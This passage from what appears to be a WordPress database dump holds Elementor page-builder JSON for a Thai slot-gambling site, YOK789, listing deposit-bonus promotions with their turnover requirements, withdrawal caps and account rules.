data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3037,403,'_thumbnail_id','347'),(3041,404,'_elementor_edit_mode','builder'),(3042,404,'_elementor_template_type','wp-page'),(3043,404,'_elementor_version','3.35.5'),(3044,404,'_elementor_pro_version','3.32.3'),(3045,404,'_wp_page_template','default'),(3046,404,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3047,404,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" 